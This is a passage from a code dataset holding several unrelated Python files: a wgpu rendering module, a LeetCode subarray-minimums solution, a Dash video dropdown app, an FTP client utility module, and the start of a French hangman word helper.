wgpu.StoreOp.store,\n }\n ],\n depth_stencil_attachment={\n \"attachment\": self._depth_texture_view,\n \"depth_load_value\": 10 ** 38,\n \"depth_store_op\": wgpu.StoreOp.store,\n \"stencil_load_value\": wgpu.LoadOp.load,\n \"stencil_store_op\": wgpu.StoreOp.store,\n },\n occlusion_query_set=None,\n )\n\n for wobject in q:\n wgpu_data = wobject._wgpu_data\n for pinfo in wgpu_data[\"render_pipelines\"]:\n render_pass.set_pipeline(pinfo[\"pipeline\"])\n for slot, vbuffer in enumerate(pinfo[\"vertex_buffers\"]):\n render_pass.set_vertex_buffer(\n slot,\n vbuffer._wgpu_buffer,\n vbuffer.vertex_byte_range[0],\n vbuffer.vertex_byte_range[1],\n )\n for bind_group_id, bind_group in enumerate(pinfo[\"bind_groups\"]):\n render_pass.set_bind_group(bind_group_id, bind_group, [], 0, 99)\n # Draw with or without index buffer\n if pinfo[\"index_buffer\"] is not None:\n ibuffer = pinfo[\"index_buffer\"]\n render_pass.set_index_buffer(ibuffer, 0, ibuffer.size)\n render_pass.draw_indexed(*pinfo[\"index_args\"])\n else:\n render_pass.draw(*pinfo[\"index_args\"])\n\n render_pass.end_pass()\n\n command_buffers.append(command_encoder.finish())\n device.default_queue.submit(command_buffers)\n\n # -----\n\n def get_render_list(self, scene: WorldObject, proj_screen_matrix: Matrix4):\n \"\"\" Given a scene object, get a list of objects to render.\n \"\"\"\n\n # start by gathering everything that is visible and has a material\n q = []\n\n def visit(wobject):\n nonlocal q\n if wobject.visible and hasattr(wobject, \"material\"):\n q.append(wobject)\n\n scene.traverse(visit)\n\n # next, sort them from back-to-front\n def sort_func(wobject: WorldObject):\n z = (\n Vector3()\n .set_from_matrix_position(wobject.matrix_world)\n .apply_matrix4(proj_screen_matrix)\n .z\n )\n return wobject.render_order, z\n\n return list(sorted(q, key=sort_func))\n\n def _make_up_to_date(self, wobject):\n \"\"\" Update the GPU objects associated with the given wobject. Returns\n quickly if no changes are needed.\n \"\"\"\n\n # Can return fast?\n if not wobject.material.dirty and hasattr(wobject, \"_wgpu_data\"):\n return\n\n wobject.material.dirty = False\n\n # Need a pipeline reset?\n if getattr(wobject.material, \"_wgpu_pipeline_dirty\", False):\n wobject._wgpu_pipeline_infos = None\n\n # Do we need to create the pipeline infos (from the renderfunc for this wobject)?\n if getattr(wobject, \"_wgpu_pipeline_infos\", None) is None:\n wobject._wgpu_data = None\n wobject._wgpu_pipeline_infos = self._get_pipeline_infos(wobject)\n\n # This could be enough\n if wobject._wgpu_pipeline_infos is None:\n wobject._wgpu_data = None\n return\n\n # Check if we need to update any resources\n # todo: this seems like a lot of work, can we keep track of what objects\n # need an update with higher precision?\n for pipeline_info in wobject._wgpu_pipeline_infos:\n buffer = pipeline_info.get(\"index_buffer\", None)\n if buffer is not None:\n self._update_buffer(buffer)\n for buffer in pipeline_info.get(\"vertex_buffers\", []):\n self._update_buffer(buffer)\n for key in pipeline_info.keys():\n if key.startswith(\"bindings\"):\n resources = pipeline_info[key]\n if isinstance(resources, dict):\n resources = resources.values()\n for binding_type, resource in resources:\n if binding_type in (\n wgpu.BindingType.uniform_buffer,\n wgpu.BindingType.storage_buffer,\n wgpu.BindingType.readonly_storage_buffer,\n ):\n assert isinstance(resource, BaseBuffer)\n self._update_buffer(resource)\n elif binding_type in (\n wgpu.BindingType.sampled_texture,\n wgpu.BindingType.readonly_storage_texture,\n wgpu.BindingType.writeonly_storage_texture,\n ):\n assert isinstance(resource, TextureView)\n self._update_texture(resource.texture)\n self._update_texture_view(resource)\n elif binding_type in (\n wgpu.BindingType.sampler,\n wgpu.BindingType.comparison_sampler,\n ):\n assert isinstance(resource, TextureView)\n self._update_sampler(resource)\n\n # Create gpu data?\n if wobject._wgpu_data is None:\n wobject._wgpu_data = self._get_pipeline_objects(wobject)\n\n def _get_pipeline_infos(self, wobject):\n\n # Make sure that the wobject has an stdinfo object\n if not hasattr(wobject, \"_wgpu_stdinfo_buffer\"):\n wobject._wgpu_stdinfo_buffer = Buffer(\n array_from_shadertype(stdinfo_uniform_type), usage=\"uniform\"\n )\n\n # Get render function for this world object,\n # and use it to get a high-level description of pipelines.\n renderfunc = registry.get_render_function(wobject)\n\n # Call render function\n render_info = RenderInfo(stdinfo=wobject._wgpu_stdinfo_buffer)\n pipeline_infos = renderfunc(wobject, render_info)\n if pipeline_infos is not None:\n assert isinstance(pipeline_infos, list)\n assert all(\n isinstance(pipeline_info, dict) for pipeline_info in pipeline_infos\n )\n return pipeline_infos\n else:\n return None\n\n def _get_pipeline_objects(self, wobject):\n\n # Prepare the three kinds of pipelines that we can get\n compute_pipelines = []\n render_pipelines = []\n alt_render_pipelines = []\n\n # Process each pipeline info object, converting each to a more concrete dict\n for pipeline_info in wobject._wgpu_pipeline_infos:\n if \"vertex_shader\" in pipeline_info and \"fragment_shader\" in pipeline_info:\n pipeline = self._compose_render_pipeline(wobject, pipeline_info)\n if pipeline_info.get(\"target\", None) is None:\n render_pipelines.append(pipeline)\n else:\n raise NotImplementedError(\"Alternative render pipelines\")\n alt_render_pipelines.append(pipeline)\n elif \"compute_shader\" in pipeline_info:\n compute_pipelines.append(\n self._compose_compute_pipeline(wobject, pipeline_info)\n )\n else:\n raise ValueError(\n \"Did not find compute_shader nor vertex_shader+fragment_shader in pipeline info.\"\n )\n\n return {\n \"compute_pipelines\": compute_pipelines,\n \"render_pipelines\": render_pipelines,\n \"alt_render_pipelines\": alt_render_pipelines,\n \"stdinfo\": wobject._wgpu_stdinfo_buffer,\n }\n\n def _compose_compute_pipeline(self, wobject, pipeline_info):\n \"\"\" Given a high-level compute pipeline description, creates a\n lower-level representation that can be consumed by wgpu.\n \"\"\"\n\n # todo: cache the pipeline with the shader (and entrypoint) as a hash\n\n device = self._device\n\n # Convert indices to args for the compute_pass.dispatch() call\n indices = pipeline_info[\"indices\"]\n if not (\n isinstance(indices, tuple)\n and len(indices) == 3\n and all(isinstance(i, int) for i in indices)\n ):\n raise RuntimeError(\n f\"Compute indices must be 3-tuple of ints, not {indices}.\"\n )\n index_args = indices\n\n # Get bind groups and pipeline layout from the buffers in pipeline_info.\n # This also makes sure the buffers and textures are up-to-date.\n bind_groups, pipeline_layout = self._get_bind_groups(pipeline_info)\n\n # Compile shader and create pipeline object\n cshader = pipeline_info[\"compute_shader\"]\n cs_module = device.create_shader_module(code=cshader)\n compute_pipeline = device.create_compute_pipeline(\n layout=pipeline_layout,\n compute_stage={\"module\": cs_module, \"entry_point\": \"main\"},\n )\n\n return {\n \"pipeline\": compute_pipeline, # wgpu object\n \"index_args\": index_args, # tuple\n \"bind_groups\": bind_groups, # list of wgpu bind_group objects\n }\n\n def _compose_render_pipeline(self, wobject, pipeline_info):\n \"\"\" Given a high-level render pipeline description, creates a\n lower-level representation that can be consumed by wgpu.\n \"\"\"\n\n # todo: cache the pipeline with a lot of things as the hash\n # todo: cache vertex descriptors\n\n device = self._device\n\n # If an index buffer is present, update it, and get index_format.\n wgpu_index_buffer = None\n index_format = wgpu.IndexFormat.uint32\n index_buffer = pipeline_info.get(\"index_buffer\", None)\n if index_buffer is not None:\n wgpu_index_buffer = index_buffer._wgpu_buffer\n index_format = index_buffer.format\n\n # Convert and check high-level indices. Indices represent a range\n # of index id's, or define what indices in the index buffer are used.\n indices = pipeline_info.get(\"indices\", None)\n if indices is None:\n if index_buffer is None:\n raise RuntimeError(\"Need indices or index_buffer \")\n indices = range(index_buffer.data.size)\n # Convert to 2-element tuple (vertex, instance)\n if not isinstance(indices, tuple):\n indices = (indices,)\n if len(indices) == 1:\n indices = indices + (1,) # add instancing index\n if len(indices) != 2:\n raise RuntimeError(\"Render pipeline indices must be a 2-element tuple.\")\n\n # Convert indices to args for the render_pass.draw() or draw_indexed()\n # draw(count_vertex, count_instance, first_vertex, first_instance)\n # draw_indexed(count_v, count_i, first_vertex, base_vertex, first_instance)\n index_args = [0, 0, 0, 0]\n for i, index in enumerate(indices):\n if isinstance(index, int):\n index_args[i] = index\n elif isinstance(index, range):\n assert index.step == 1\n index_args[i] = index.stop - index.start\n index_args[i + 2] = index.start\n else:\n raise RuntimeError(\n \"Render pipeline indices must be a 2-element tuple with ints or ranges.\"\n )\n if wgpu_index_buffer is not None:\n base_vertex = 0 # A value added to each index before reading [...]\n index_args.insert(-1, base_vertex)\n\n # Process vertex buffers. Update the buffer, and produces a descriptor.\n vertex_buffers = []\n vertex_buffer_descriptors = []\n # todo: we can probably expose multiple attributes per buffer using a BufferView\n # todo: also, must vertex_buffers be a dict?\n # -> can we also leverage numpy here?\n for slot, buffer in enumerate(pipeline_info.get(\"vertex_buffers\", [])):\n vbo_des = {\n \"array_stride\": buffer.nbytes // buffer.nitems,\n \"stepmode\": wgpu.InputStepMode.vertex, # vertex or instance\n \"attributes\": [\n {\"format\": buffer.format, \"offset\": 0, \"shader_location\": slot,}\n ],\n }\n vertex_buffers.append(buffer)\n vertex_buffer_descriptors.append(vbo_des)\n\n # Get bind groups and pipeline layout from the buffers in pipeline_info.\n # This also makes sure the buffers and textures are up-to-date.\n bind_groups, pipeline_layout = self._get_bind_groups(pipeline_info)\n\n # Compile shaders\n vshader = pipeline_info[\"vertex_shader\"]\n fshader = pipeline_info[\"fragment_shader\"]\n vs_module = device.create_shader_module(code=vshader)\n fs_module = device.create_shader_module(code=fshader)\n\n # Instantiate the pipeline object\n pipeline = device.create_render_pipeline(\n layout=pipeline_layout,\n vertex_stage={\"module\": vs_module, \"entry_point\": \"main\"},\n fragment_stage={\"module\": fs_module, \"entry_point\": \"main\"},\n primitive_topology=pipeline_info[\"primitive_topology\"],\n rasterization_state={\n \"front_face\": wgpu.FrontFace.ccw,\n \"cull_mode\": wgpu.CullMode.none,\n \"depth_bias\": 0,\n \"depth_bias_slope_scale\": 0.0,\n \"depth_bias_clamp\": 0.0,\n },\n color_states=[\n {\n \"format\": wgpu.TextureFormat.bgra8unorm_srgb,\n \"alpha_blend\": (\n wgpu.BlendFactor.one,\n wgpu.BlendFactor.zero,\n wgpu.BlendOperation.add,\n ),\n \"color_blend\": (\n wgpu.BlendFactor.src_alpha,\n wgpu.BlendFactor.one_minus_src_alpha,\n wgpu.BlendOperation.add,\n ),\n \"write_mask\": wgpu.ColorWrite.ALL,\n }\n ],\n depth_stencil_state={\n \"format\": wgpu.TextureFormat.depth32float,\n \"depth_write_enabled\": True, # optional\n \"depth_compare\": wgpu.CompareFunction.less, # optional\n },\n vertex_state={\n \"index_format\": index_format,\n \"vertex_buffers\": vertex_buffer_descriptors,\n },\n sample_count=1,\n sample_mask=0xFFFFFFFF,\n alpha_to_coverage_enabled=False,\n )\n\n return {\n \"pipeline\": pipeline, # wgpu object\n \"index_args\": index_args, # tuple\n \"index_buffer\": wgpu_index_buffer, # BaseBuffer\n \"vertex_buffers\": vertex_buffers, # list of BaseBuffer\n \"bind_groups\": bind_groups, # list of wgpu bind_group objects\n }\n\n def _get_bind_groups(self, pipeline_info):\n \"\"\" Given high-level information on bindings, create the corresponding\n wgpu objects and make sure that all buffers and textures are up-to-date.\n Returns (bind_groups, pipeline_layout).\n \"\"\"\n # todo: cache bind_group_layout objects\n # todo: cache pipeline_layout objects\n # todo: can perhaps be more specific about visibility\n\n device = self._device\n\n # Collect resource groups (keys e.g. \"bindings1\", \"bindings132\")\n resource_groups = []\n for key in pipeline_info.keys():\n if key.startswith(\"bindings\"):\n i = int(key[len(\"bindings\") :])\n assert i >= 0\n while len(resource_groups) <= i:\n resource_groups.append({})\n resource_groups[i] = pipeline_info[key]\n\n # Create bind groups and bind group layouts\n bind_groups = []\n bind_group_layouts = []\n for resources in resource_groups:\n if not isinstance(resources, dict):\n resources = {slot: resource for slot, resource in enumerate(resources)}\n # Collect list of dicts\n bindings = []\n binding_layouts = []\n for slot, type_resource in resources.items():\n assert isinstance(type_resource, tuple) and len(type_resource) == 2\n binding_type, resource = type_resource\n\n if binding_type in (\n wgpu.BindingType.uniform_buffer,\n wgpu.BindingType.storage_buffer,\n wgpu.BindingType.readonly_storage_buffer,\n ):\n # A buffer resource\n assert isinstance(resource, BaseBuffer)\n bindings.append(\n {\n \"binding\": slot,\n \"resource\": {\n \"buffer\": resource._wgpu_buffer,\n \"offset\": 0,\n \"size\": resource.nbytes,\n },\n }\n )\n binding_layouts.append(\n {\n \"binding\": slot,\n \"visibility\": visibility_all,\n \"type\": binding_type,\n \"has_dynamic_offset\": False,\n }\n )\n\n elif binding_type in (\n wgpu.BindingType.sampled_texture,\n wgpu.BindingType.readonly_storage_texture,\n wgpu.BindingType.writeonly_storage_texture,\n ):\n # A texture view resource\n assert isinstance(resource, TextureView)\n bindings.append(\n {\"binding\": slot, \"resource\": resource._wgpu_texture_view,}\n )\n visibility = visibility_all\n if binding_type == wgpu.BindingType.sampled_texture:\n visibility = wgpu.ShaderStage.FRAGMENT\n fmt = resource.format\n dim = resource.view_dim\n component_type = wgpu.TextureComponentType.sint\n if \"uint\" in fmt:\n component_type = wgpu.TextureComponentType.uint\n if \"float\" in fmt or \"norm\" in fmt:\n component_type = wgpu.TextureComponentType.float\n binding_layout = {\n \"binding\": slot,\n \"visibility\": visibility,\n \"type\": binding_type,\n \"view_dimension\": getattr(wgpu.TextureViewDimension, dim, dim),\n \"texture_component_type\": component_type,\n # \"multisampled\": False,\n }\n if \"storage\" in binding_type:\n binding_layout[\"storage_texture_format\"] = fmt\n binding_layouts.append(binding_layout)\n\n elif binding_type in (\n wgpu.BindingType.sampler,\n wgpu.BindingType.comparison_sampler,\n ):\n # A sampler resource\n assert isinstance(resource, TextureView)\n bindings.append(\n {\"binding\": slot, \"resource\": resource._wgpu_sampler,}\n )\n binding_layouts.append(\n {\n \"binding\": slot,\n \"visibility\": wgpu.ShaderStage.FRAGMENT,\n \"type\": binding_type,\n }\n )\n\n # Create wgpu objects\n bind_group_layout = device.create_bind_group_layout(entries=binding_layouts)\n bind_group = device.create_bind_group(\n layout=bind_group_layout, entries=bindings\n )\n bind_groups.append(bind_group)\n bind_group_layouts.append(bind_group_layout)\n\n # Create pipeline layout object from list of layouts\n pipeline_layout = device.create_pipeline_layout(\n bind_group_layouts=bind_group_layouts\n )\n\n return bind_groups, pipeline_layout\n\n def _update_buffer(self, resource):\n buffer = getattr(resource, \"_wgpu_buffer\", None)\n if not (buffer is None or resource.dirty):\n return\n\n # todo: dispose an old buffer? / reuse an old buffer?\n\n pending_uploads = resource._pending_uploads\n resource._pending_uploads = []\n\n # Create buffer if needed\n if buffer is None or buffer.size != resource.nbytes:\n usage = wgpu.BufferUsage.COPY_DST\n for u in resource.usage.split(\"|\"):\n usage |= getattr(wgpu.BufferUsage, u)\n buffer = self._device.create_buffer(size=resource.nbytes, usage=usage)\n\n # Upload any pending data\n for offset, size in pending_uploads:\n bytes_per_item = resource.nbytes // resource.nitems\n boffset, bsize = bytes_per_item * offset, bytes_per_item * size\n sub_buffer = self._device.create_buffer_mapped(\n size=bsize, usage=wgpu.BufferUsage.COPY_SRC,\n )\n resource._renderer_copy_data_to_ctypes_object(\n sub_buffer.mapping, offset, size\n )\n sub_buffer.unmap()\n command_encoder = self._device.create_command_encoder()\n command_encoder.copy_buffer_to_buffer(sub_buffer, 0, buffer, boffset, bsize)\n self._device.default_queue.submit([command_encoder.finish()])\n resource._wgpu_buffer = buffer\n\n def _update_texture_view(self, resource):\n if getattr(resource, \"_wgpu_texture_view\", None) is None:\n if resource._is_default_view:\n texture_view = resource.texture._wgpu_texture.create_view()\n else:\n dim = resource._dim\n assert resource._mip_range.step == 1\n assert resource._layer_range.step == 1\n texture_view = resource.texture._wgpu_texture.create_view(\n format=resource._format,\n dimension=f\"{dim}d\" if isinstance(dim, int) else dim,\n aspect=resource._aspect,\n base_mip_level=resource._mip_range.start,\n mip_level_count=len(resource._mip_range),\n base_array_layer=resource._layer_range.start,\n array_layer_count=len(resource._layer_range),\n )\n resource._wgpu_texture_view = texture_view\n\n def _update_texture(self, resource):\n if not resource.dirty:\n return\n\n texture = getattr(resource, \"_wgpu_texture\", None)\n pending_uploads = resource._pending_uploads\n resource._pending_uploads = []\n\n # Create texture if needed\n if texture is None: # todo: or needs to be replaced (e.g. resized)\n usage = wgpu.TextureUsage.COPY_DST\n for u in resource.usage.split(\"|\"):\n usage |= getattr(wgpu.TextureUsage, u)\n texture = self._device.create_texture(\n size=resource.size,\n usage=usage,\n dimension=f\"{resource.dim}d\",\n format=getattr(wgpu.TextureFormat, resource.format),\n mip_level_count=1,\n sample_count=1,\n ) # todo: let resource specify mip_level_count and sample_count\n\n # Upload any pending data\n for offset, size in pending_uploads:\n bytes_per_pixel = resource.nbytes // (\n resource.size[0] * resource.size[1] * resource.size[2]\n )\n nbytes = bytes_per_pixel * size[0] * size[1] * size[2]\n sub_buffer = self._device.create_buffer_mapped(\n size=nbytes, usage=wgpu.BufferUsage.COPY_SRC,\n )\n resource._renderer_copy_data_to_ctypes_object(\n sub_buffer.mapping, offset, size\n )\n sub_buffer.unmap()\n command_encoder = self._device.create_command_encoder()\n command_encoder.copy_buffer_to_texture(\n {\n \"buffer\": sub_buffer,\n \"offset\": 0,\n \"bytes_per_row\": size[0] * bytes_per_pixel,\n \"rows_per_image\": size[1],\n },\n {\n \"texture\": texture,\n \"mip_level\": 0,\n \"array_layer\": 0,\n \"origin\": offset,\n },\n copy_size=size,\n )\n self._device.default_queue.submit([command_encoder.finish()])\n resource._wgpu_texture = texture\n\n def _update_sampler(self, resource):\n # A sampler's info (and raw object) are stored on a TextureView\n if getattr(resource, \"_wgpu_sampler\", None) is None:\n amodes = resource._address_mode.replace(\",\", \" \").split() or [\"clamp\"]\n while len(amodes) < 3:\n amodes.append(amodes[-1])\n filters = resource._filter.replace(\",\", \" \").split() or [\"nearest\"]\n while len(filters) < 3:\n filters.append(filters[-1])\n ammap = {\"clamp\": \"clamp-to-edge\", \"mirror\": \"mirror-repeat\"}\n sampler = self._device.create_sampler(\n address_mode_u=ammap.get(amodes[0], amodes[0]),\n address_mode_v=ammap.get(amodes[1], amodes[1]),\n address_mode_w=ammap.get(amodes[2], amodes[2]),\n mag_filter=filters[0],\n min_filter=filters[1],\n mipmap_filter=filters[2],\n # lod_min_clamp -> use default 0\n # lod_max_clamp -> use default inf\n # compare -> only not-None for comparison samplers!\n )\n resource._wgpu_sampler = sampler\n","sub_path":"visvis2/renderers/wgpu/_wgpurenderer.py","file_name":"_wgpurenderer.py","file_ext":"py","file_size_in_byte":31971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"653216586","text":"\"\"\"\n# 907. Sum of Subarray Minimums\n\n# Given an array of integers A, find the sum of min(B), where B ranges over every (contiguous) subarray of A.\n\n# Since the answer may be large, return the answer modulo 10^9 + 7.\n\n\n# Example 1:\n\n# Input: [3,1,2,4]\n# Output: 17\n# Explanation: Subarrays are [3], [1], [2], [4], [3,1], [1,2], [2,4], [3,1,2], [1,2,4], [3,1,2,4].\n# Minimums are 3, 1, 2, 4, 1, 1, 2, 1, 1, 1. Sum is 17.\n\n\n# Note:\n\n# 1 <= A.length <= 30000\n# 1 <= A[i] <= 30000\n\n\"\"\"\n\n\nclass SumSubarrayMins:\n\n \"\"\"\n Approach 1: Prev/Next Array\n Intuition\n\n Let's try to count the number of subarrays #(j) for which A[j] is the right-most minimum. Then, the answer will be sum #(j) * A[j].\n (We must say right-most so that we form disjoint sets of subarrays and do not double count any, as the minimum of an array may not be unique.)\n\n This in turn brings us the question of knowing the smallest index i <= j for which A[i], A[i+1], ..., A[j] are all >= A[j];\n and the largest index k >= j for which A[j+1], A[j+2], ..., A[k] are all > A[j].\n\n Algorithm\n\n For example, if A = [10, 3, 4, 5, _3_, 2, 3, 10] and we would like to know #(j = 4) [the count of the second 3, which is marked], we would find i = 1 and k = 5.\n\n From there, the actual count is #(j) = (j - i + 1) * (k - j + 1), as there are j - i + 1 choices i, i+1, ..., j for the left index of the subarray,\n and k - j + 1 choices j, j+1, ..., k for the right index of the subarray.\n\n Answering these queries (ie. determining (i, k) given j) is a classic problem that can be answered with a stack.\n We'll focus on the problem of finding i: the problem of finding k is similar.\n\n Making a Prev Array\n\n The idea is to maintain stack, a monotone decreasing subsequence of A (actually, indices of A in implementation).\n These represent candidate boundaries i* - 1 for the next query, stored in increasing order of A[i*].\n\n Now considering j in increasing order, we can remove candidates for which A[i*] <= A[j] in decreasing order of i*.\n\n For example, if A = [10, 5, 3, 7, 0, 4, 5, 2, 1, _8_], then when considering j = 9 (A[j] = 8),\n we have a stack of boundaries like [-1, 0, 3, 6] (representing A[i*] = -inf, 10, 7, 5). We pop 6 and 3 from the stack,\n as 5 <= 8 and 7 <= 8, and we get the answer boundary i* - 1 = 0.\n\n Note that this process is linear, since we do a linear amount of pushes and pops of the stack in total.\n\n This is quite difficult to figure out, but this type of technique occurs often in many other problems, so it is worth learning in detail.\n\n Complexity Analysis\n\n Time Complexity: O(N), where NN is the length of A.\n\n Space Complexity: O(N).\n \"\"\"\n def doit_stack(self, A):\n MOD = 10**9 + 7\n N = len(A)\n\n # prev has i* - 1 in increasing order of A[i* - 1]\n # where i* is the answer to query j\n stack = []\n prev = [None] * N\n for i in range(N):\n while stack and A[i] <= A[stack[-1]]:\n stack.pop()\n prev[i] = stack[-1] if stack else -1\n stack.append(i)\n\n # next has k* + 1 in increasing order of A[k* + 1]\n # where k* is the answer to query j\n stack = []\n next_ = [None] * N\n for k in range(N-1, -1, -1):\n while stack and A[k] < A[stack[-1]]:\n stack.pop()\n next_[k] = stack[-1] if stack else N\n stack.append(k)\n\n # Use prev/next array to count answer\n return sum((i - prev[i]) * (next_[i] - i) * A[i] for i in range(N)) % MOD\n\n def doit_stack1(self, A):\n ans, st, n, hMod = 0, [], len(A), 10 ** 9 + 7\n\n for i in range(n + 1):\n while st and A[st[-1]] > (0 if i == n else A[i]):\n j = st.pop()\n k = st[-1] if st else -1\n ans = (ans + A[j] * (i - j) * (j - k)) % hMod\n st.append(i)\n return ans\n\n # (DP) O(n^2) O(TLE)\n def doit_dp_tle(self, A):\n N = len(A)\n dp = [[A[i] if i == j else float('inf') for j in range(N)] for i in range(N)]\n\n ans = 0\n for i in range(N):\n for s in range(1, N - i):\n j = i + s\n dp[i][j] = min(dp[i][j-1], A[j])\n ans += dp[i][j]\n\n return (ans + sum(dp[i][i] for i in range(N))) % (10**9 + 7)\n\n \"\"\"\n Approach 2: Maintain Stack of Minimums\n Intuition\n\n For a specific j, let's try to count the minimum of each subarray [i, j]. The intuition is that as we increment j++, these minimums may be related to each other.\n Indeed, min(A[i:j+1]) = min(A[i:j], A[j]).\n\n Playing with some array like A = [1,7,5,2,4,3,9], with j = 6 the minimum of each subarray [i, j] is B = [1,2,2,2,3,3,9].\n We can see that there are critical points i = 0, i = 3, i = 5, i = 6 where a minimum is reached for the first time when walking left from j.\n\n Algorithm\n Let's try to maintain an RLE (run length encoding) of these critical points B.\n More specifically, for the above (A, j), we will maintain stack = [(val=1, count=1), (val=2, count=3), (val=3, count=2), (val=9, count=1)],\n that represents a run length encoding of the subarray minimums B = [1,2,2,2,3,3,9]. For each j, we want sum(B).\n\n As we increment j, we will have to update this stack to include the newest element (val=x, count=1).\n We need to pop off all values >= x before, as the minimum of the associated subarray [i, j] will now be A[j] instead of what it was before.\n\n At the end, the answer is the dot product of this stack: ∑ e.val ∗ e.count (e ∈ stack), which we also maintain on the side as the variable dot.\n\n Complexity Analysis\n\n Time Complexity: O(N), where N is the length of A.\n Space Complexity: O(N).\n\n \"\"\"\n def doit_stack(self, A):\n stack = []\n ans = dot = 0\n\n for c in A:\n # Add all answers for subarrays [i, j], i <= j\n count = 1\n while stack and stack[-1][0] >= c:\n v, cnt = stack.pop()\n count += cnt\n dot -= v * cnt\n\n stack.append((c, count))\n dot += c * count\n ans += dot\n\n return ans % (10**9 + 7)\n\n def doit(self, A):\n res = 0\n stack = [] # non-decreasing\n A = [float('-inf')] + A + [float('-inf')]\n for i, n in enumerate(A):\n while stack and A[stack[-1]] > n:\n cur = stack.pop()\n res += A[cur] * (i - cur) * (cur - stack[-1])\n stack.append(i)\n\n return res % (10**9 + 7)\n\n\nif __name__ == '__main__':\n\n res = SumSubarrayMins().doit([3, 1, 2, 4])\n\n pass\n","sub_path":"PythonLeetcode/leetcodeM/907_SumOfSubarrayMinimums.py","file_name":"907_SumOfSubarrayMinimums.py","file_ext":"py","file_size_in_byte":6676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"259418074","text":"import dash\nfrom dash.dependencies import Input, Output\nimport dash_core_components as dcc\nimport dash_html_components as html\n\n\napp = dash.Dash()\napp.layout = html.Div([\n html.Div(id='target'),\n dcc.Dropdown(\n id='dropdown',\n options=[\n {'label': 'Video 1', 'value': 'video1'},\n {'label': 'Video 2', 'value': 'video2'},\n {'label': 'Video 3', 'value': 'video3'},\n ],\n value='video1'\n )\n])\n\n\n@app.callback(Output('target', 'children'), [Input('dropdown', 'value')])\ndef embed_iframe(value):\n videos = {\n 'video1': 'sea2K4AuPOk',\n 'video2': '5BAthiN0htc',\n 'video3': 'e4ti2fCpXMI',\n }\n return html.Iframe(src=f'https://www.youtube.com/embed/{videos[value]}')\n\nif __name__ == '__main__':\n app.run_server(debug=True)","sub_path":"appTest.py","file_name":"appTest.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"447510710","text":"import os\nimport time\nimport sys\nimport hashlib,hmac,json,struct\nimport configparser\nfrom conf import settings\n\nclass Config_hander:\n\n @classmethod\n def getConfig(self,section,key):\n config = configparser.ConfigParser()\n path = settings.MARGS_DIR\n config.read(path)\n return config.get(section,key)\n @classmethod\n def modConfig(self,section,key,value):\n config = configparser.ConfigParser()\n path = settings.MARGS_DIR\n config.read(path)\n config.set(section,key,value)\n config.write(open(path, \"w\"))\n\n @classmethod\n def getuserinfo(self, section, key):\n config = configparser.ConfigParser()\n path = settings.USERINFO\n config.read(path)\n return config.get(section, key)\n\n\n\n\n# aa = Config_hander.getConfig('processbar','width')\n# print(aa)\n# bb = Config_hander.modConfig('processbar','width','100')\n\n\n\nclass Processbar:\n '''###进度条########'''\n width = int(Config_hander.getConfig('processbar','width'))\n @classmethod\n def process(self,percent):\n if percent >=1:\n percent = 1\n showpro = '[%%-%ds]'%self.width% (int(self.width*percent)*'#')\n print('\\r%s %d%%'%(showpro,int(percent*100)),file=sys.stdout,flush=True,end='')\n\n\nclass Md5_salt:\n '''md5 加盐'''\n secret_key = Config_hander.getConfig('md5_salt','secretkey')\n @classmethod\n def file_md5(self,file):\n m=hmac.new(self.secret_key.encode('utf-8'))\n\n with open(file,'rb') as f:\n for line in f:\n #print(line)\n m.update(line)\n return m.hexdigest()\n\n @classmethod\n def msg_md5(self,msg):\n m = hmac.new(self.secret_key.encode('utf-8'))\n m.update(msg)\n return m.hexdigest()\n\n# aa = Md5_salt.file_md5('E:/pycharn/socket_train/FTP_demo/src/model_client.py')\n# print(aa)\n# bb = Md5_salt.msg_md5('aaaaaa')\n# print(bb)\n\nclass Make_header:\n @classmethod\n def makeheader(self,fsize,filename,md5):\n dic_head = {'total_size': fsize, 'file_name': filename, 'md5': md5}\n rr = json.dumps(dic_head)\n\n head_bytes = bytes(rr.encode('utf-8'))\n\n msg0 = struct.pack('i', len(head_bytes))\n msg1 = head_bytes\n msg_list = [msg0, msg1]\n return msg_list\n\n @classmethod\n def auth_header(self, fsize, username,passwd):\n dic_head = {'total_size': fsize, 'username': username,'passwd':passwd}\n rr = json.dumps(dic_head)\n\n head_bytes = bytes(rr.encode('utf-8'))\n\n msg0 = struct.pack('i', len(head_bytes))\n msg1 = head_bytes\n msg_list = [msg0, msg1]\n return msg_list\n\n @classmethod\n def msgheader(self, fsize):\n dic_head = {'total_size': fsize}\n rr = json.dumps(dic_head)\n\n head_bytes = bytes(rr.encode('utf-8'))\n\n msg0 = struct.pack('i', len(head_bytes))\n msg1 = head_bytes\n msg_list = [msg0, msg1]\n return msg_list\n\nclass Timer:\n\n @classmethod\n def circle(cls,t):\n dot = 'connecting .'\n while t > 0:\n dot = dot + '.'\n time.sleep(0.6)\n print('\\r',dot,file=sys.stdout,flush=True,end='')\n t -=2\n\n\n\n\n\n\n","sub_path":"lib/comm.py","file_name":"comm.py","file_ext":"py","file_size_in_byte":3237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"646137588","text":"\"\"\"\n IPSA IN21 TP2 : jeu du pendu\n Ce module utilise un fichier dictionnaire de mots français sous licence GNU\n récupéré depuis : http://www.winedt.org/Dict/\n Les définitions des mots sont tirées du site cnrtl.fr\n IPSA - BONNEFOI - 2017\n\"\"\"\n\ndef motAléatoire():\n \"\"\" retourne un mot tiré aléatoirement depuis un fichier dictionnaire\n le dictionnaire utilisé est en open source sur le site de winedt\n \"\"\"\n import random\n location = \"fr_utf8.dic\"\n FDico = open(location,'r',encoding='utf-8') # ouverture du fichier\n #total_lignes = sum(1 for line in FDico) # nombre de ligne du fichier\n #FDico.seek(0)\n total_lignes = 338989\n num_mot_alea = random.randrange(0, total_lignes)# no aléatoire\n mot = FDico.readlines()[num_mot_alea] # lecture de la ligne aléatoire\n mot = mot[:-1] # retrait du caractère 'nouvelle ligne'\n return mot\n\ndef getWebDefinition(mot):\n \"\"\"\n retourne une chainne de caractère conrtenant les définitions\n du mot passé en paramètre\n les définitions sont obtenue en effectuant une requète HTTP\n sur le site du cnrtl.\n\n \"\"\"\n import urllib.request # faire des requètes web\n import xml.etree.ElementTree as ET # analyse de page web\n import html # pour convertir les résultats html en unicode\n\n url = \"http://www.cnrtl.fr/definition/\" # début de l 